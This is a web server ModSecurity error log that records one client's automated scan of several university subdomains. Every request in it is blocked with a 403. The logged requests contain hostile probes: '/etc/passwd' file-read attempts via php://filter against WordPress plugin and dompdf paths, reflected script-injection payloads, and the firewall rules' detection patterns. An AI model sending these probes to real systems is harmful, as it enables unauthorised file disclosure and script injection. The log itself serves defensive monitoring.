[Tue Aug 29 11:53:27.492604 2023] [:error] [pid 2592] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAog@FoAAAAY"]
[Tue Aug 29 11:53:27.559284 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoesOUAAAAV"]
[Tue Aug 29 11:53:27.560450 2023] [:error] [pid 2583] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:query: \\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/search"] [unique_id "ZO15x8Co-f0AAAoXJxcAAAAP"]
[Tue Aug 29 11:53:27.735109 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/dompdf.php"] [unique_id "ZO15x8Co-f0AAAofm70AAAAX"]
[Tue Aug 29 11:53:27.774588 2023] [:error] [pid 2611] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoz71sAAAAS"]
[Tue Aug 29 11:53:27.775324 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoesOYAAAAV"]
[Tue Aug 29 11:53:27.842768 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:file: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wp-swimteam/include/user/download.php"] [unique_id "ZO15x8Co-f0AAAoT7YQAAAAD"]
[Tue Aug 29 11:53:27.886825 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAowNpUAAAAH"]
[Tue Aug 29 11:53:27.918530 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAox7HEAAAAN"]
[Tue Aug 29 11:53:27.989315 2023] [:error] [pid 2571] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/blogtopdf/dompdf/dompdf.php"] [unique_id "ZO15x8Co-f0AAAoLfToAAAAG"]
[Tue Aug 29 11:53:28.039681 2023] [:error] [pid 2591] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAofm78AAAAX"]
[Tue Aug 29 11:53:28.044917 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAoesOkAAAAV"]
[Tue Aug 29 11:53:28.052118 2023] [:error] [pid 2605] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAot8QAAAAAn"]
[Tue Aug 29 11:53:28.055376 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAox7HIAAAAN"]
[Tue Aug 29 11:53:28.057562 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAolKXIAAAAe"]
[Tue Aug 29 11:53:28.109458 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15yMCo-f0AAAowNpcAAAAH"]
[Tue Aug 29 11:53:28.116775 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAo0gOMAAAAZ"]
[Tue Aug 29 11:53:28.808760 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAor7ssAAAAk"]
[Tue Aug 29 11:53:28.813115 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAowNpgAAAAH"]
[Tue Aug 29 11:53:28.820529 2023] [:error] [pid 2579] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoT7YgAAAAD"]
[Tue Aug 29 11:53:28.823320 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAo0gOQAAAAZ"]
[Tue Aug 29 11:53:28.824837 2023] [:error] [pid 2582] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAoW7QgAAAAJ"]
[Tue Aug 29 11:53:28.891581 2023] [:error] [pid 2530] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAni-E8AAAAU"]
[Tue Aug 29 11:53:28.907646 2023] [:error] [pid 2590] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15yMCo-f0AAAoesOwAAAAV"]
[Tue Aug 29 11:53:28.909160 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAox7HUAAAAN"]
[Tue Aug 29 11:53:28.919564 2023] [:error] [pid 2575] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:module: module\\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/mods/clansphere/lang_modvalidate.php"] [unique_id "ZO15yMCo-f0AAAoPubgAAAAM"]
[Tue Aug 29 11:53:28.922639 2023] [:error] [pid 2603] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/PhpSpreadsheet/Writer/PDF/DomPDF.php"] [unique_id "ZO15yMCo-f0AAAor7swAAAAk"]
[Tue Aug 29 11:53:28.958871 2023] [:error] [pid 2006] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:module. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:module: 'onm<a>ouseover=alert(document.domain)'\\x22tabindex=1"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/module/"] [unique_id "ZO15yMCo-f0AAAfWOXsAAAAL"]
[Tue Aug 29 11:53:29.377268 2023] [:error] [pid 2612] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAo0gOYAAAAZ"]
[Tue Aug 29 11:53:29.381300 2023] [:error] [pid 2608] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAowNpsAAAAH"]
[Tue Aug 29 11:53:29.382988 2023] [:error] [pid 2609] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:input_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:input_file: php://filter/resource=/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/gboutique/library/dompdf/dompdf.php"] [unique_id "ZO15ycCo-f0AAAox7HYAAAAN"]
[Tue Aug 29 11:53:29.385153 2023] [:error] [pid 2597] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:command. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x95\\x5c\\x8e\\xa6 found within ARGS:command: \\x95\\x5c\\x8e\\xa6"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/Solar_History.php"] [unique_id "ZO15ycCo-f0AAAolKXYAAAAe"]
